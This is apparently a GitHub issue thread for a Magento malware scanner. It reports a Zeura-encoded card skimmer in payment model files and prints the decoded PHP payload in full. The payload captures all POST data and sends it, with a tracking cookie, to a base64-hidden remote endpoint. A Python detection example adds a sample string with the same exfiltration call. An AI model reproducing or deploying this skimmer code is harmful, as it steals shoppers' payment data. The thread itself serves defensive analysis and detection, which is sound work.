gwillem/magento-malware-scanner

Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php

Opened this issue · 1 comment

I found this line manually after a deep mwscan:

```php
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__); eval(base64_decode("ENCRYPT...
```

When I decrypt Zeura I get the following code at the end of the file:

```php
<?php
// Decoded Zeura payload as posted, reindented and commented for readability
// (behaviour unchanged). It is a form grabber: every POST hitting the infected
// payment file is flattened and shipped to the attacker's endpoint.
if (isset($_POST)) {
    // Flatten the whole $_POST array (nested arrays included) into a query string.
    $EvxCq = WmJQW('', $_POST, 0);

    // Per-victim tracking id kept in the BMMLN cookie: "<unix time>-<crc32(uniqid())>".
    $_COOKIE['BMMLN'] != null
        ? $SflHflmRjQ = $_COOKIE['BMMLN']
        : setcookie('BMMLN', $SflHflmRjQ = time() . '-' . crc32(uniqid()), time() + 86000, '/', $_SERVER['HTTP_HOST']);

    // Exfiltrate. The base64 literal decodes to https://localserver.host/api/index.php
    file_get_contents(
        base64_decode('aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='),
        FALSE,
        stream_context_create(array('http' => array(
            'method'  => 'POST',
            'header'  => 'Content-type: application/x-www-form-urlencoded',
            'content' => http_build_query(array(
                'info'     => base64_encode($EvxCq),   // the captured form data
                'hostname' => $_SERVER['HTTP_HOST'],   // which shop it came from
                'sub'      => 2,
                'key'      => $SflHflmRjQ,             // the tracking id
            )),
        )))
    );
}

// Recursively serialises an array as key=value pairs joined by '&'.
function WmJQW($bRrNN, $CYRnG, $qabbF) {
    foreach ($CYRnG as $vikBC => $PmGhs) {
        if (!is_array($PmGhs)) {
            if ($qabbF == 1) {
                $dwTSf[] = $bRrNN . '[' . $vikBC . ']=' . $PmGhs;
            } else {
                $dwTSf[] = $vikBC . '=' . $PmGhs;
            }
        } else {
            $dwTSf[] = WmJQW($vikBC, $PmGhs, 1);
        }
    }
    return implode('&', $dwTSf);
}
?>
```

Thanks for submitting. I'm not sure how we should proceed here, unless we would flag all "zeura"-encrypted files. Perhaps we should flag the existence of "zeura" in specific Magento files. Then we would have to rewrite the scanner to pass the filename as an attribute to the scan function. See also VirusTotal/yara#202
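One way to implement the path-aware check the maintainer is weighing, as an added example that is not part of mwscan or of this thread. It assumes a Zeura loader signature (the vendor banner, or `file(__FILE__)` followed shortly by `eval(base64_decode(...))`), a hand-picked list of core Magento paths, and a token heuristic for the decoded form grabber; the sample inputs are constructed with dummy base64 blobs, except for the C2 literal, which is the one from the decoded payload above. It also decodes `base64_decode('...')` literals so the hidden URL surfaces as an IOC:

```python
import base64
import re
from fnmatch import fnmatch
from typing import List, Optional

# Loader signature for the Zeura outer layer: the vendor banner, or
# file(__FILE__) followed within 200 bytes by eval(base64_decode(...)).
ZEURA_BANNER = re.compile(rb"PHP Encode v[\d.]+ by zeura\.com", re.I)
ZEURA_LOADER = re.compile(
    rb"file\s*\(\s*__FILE__\s*\).{0,200}?eval\s*\(\s*base64_decode\s*\(", re.S
)

# Tokens that together characterise the decoded payload: POST data flattened and
# shipped to a base64-hidden URL with a tracking cookie. Heuristic, not a fingerprint.
EXFIL_TOKENS = (b"$_POST", b"http_build_query", b"stream_context_create",
                b"file_get_contents", b"base64_decode", b"setcookie")

# Core Magento paths where an encoded file is never legitimate. Constructed for
# this example; a real deployment would derive it from the shipped core tree.
CORE_PATHS = (
    "app/code/core/Mage/Payment/Model/Method/*.php",
    "app/code/core/Mage/Checkout/*",
    "app/code/core/Mage/Customer/*",
    "app/Mage.php",
    "index.php",
)


def is_zeura_encoded(content: bytes) -> bool:
    return bool(ZEURA_BANNER.search(content) or ZEURA_LOADER.search(content))


def looks_like_post_exfil(content: bytes) -> bool:
    return all(tok in content for tok in EXFIL_TOKENS)


def in_core(path: str) -> bool:
    # fnmatch's '*' also matches '/', so "Mage/Checkout/*" covers the whole subtree.
    return any(fnmatch(path, pat) for pat in CORE_PATHS)


def scan(path: str, content: bytes) -> Optional[str]:
    """Classify one file. `path` is relative to the Magento root, forward slashes."""
    if looks_like_post_exfil(content):
        return "post_exfiltration"          # malicious whatever the path
    if is_zeura_encoded(content):
        # Encoded code inside a shipped core file means the file was replaced;
        # elsewhere it may be a paid extension, so report at lower severity.
        return "zeura_in_magento_core" if in_core(path) else "zeura_encoded_file"
    return None


_B64_LITERAL = re.compile(rb"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def extract_b64_strings(content: bytes) -> List[str]:
    """Decode every base64_decode('...') literal that yields printable ASCII (IOCs)."""
    out = []
    for m in _B64_LITERAL.finditer(content):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


# Constructed samples mimicking the two layers from the issue (dummy blob "QUJD",
# i.e. "ABC", stands in for the real encoded body).
SAMPLE_LOADER = (b'<?php /*** PHP Encode v1.0 by zeura.com ***/ '
                 b'$x=file(__FILE__); eval(base64_decode("QUJD"));')
SAMPLE_PAYLOAD = (b'<?php if(isset($_POST)){ setcookie("k", time()); '
                  b"file_get_contents(base64_decode('aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='),"
                  b" FALSE, stream_context_create(array('http'=>array("
                  b"'content'=>http_build_query($_POST))))); }")
SAMPLE_CLEAN = b"<?php class Mage_Payment_Model_Method_Cc extends Mage_Payment_Model_Method_Abstract {}"

if __name__ == "__main__":
    cc = "app/code/core/Mage/Payment/Model/Method/Cc.php"
    for name, blob in (("loader", SAMPLE_LOADER), ("payload", SAMPLE_PAYLOAD), ("clean", SAMPLE_CLEAN)):
        print(name, cc, scan(cc, blob), extract_b64_strings(blob))
```

The severity split is the point: the same Zeura signature is a finding only when the path is one Magento ships, which is why the scan function needs the filename and not just the bytes. The token heuristic for the decoded layer is deliberately loose; tighten it against your own false-positive corpus before enabling it outside core paths.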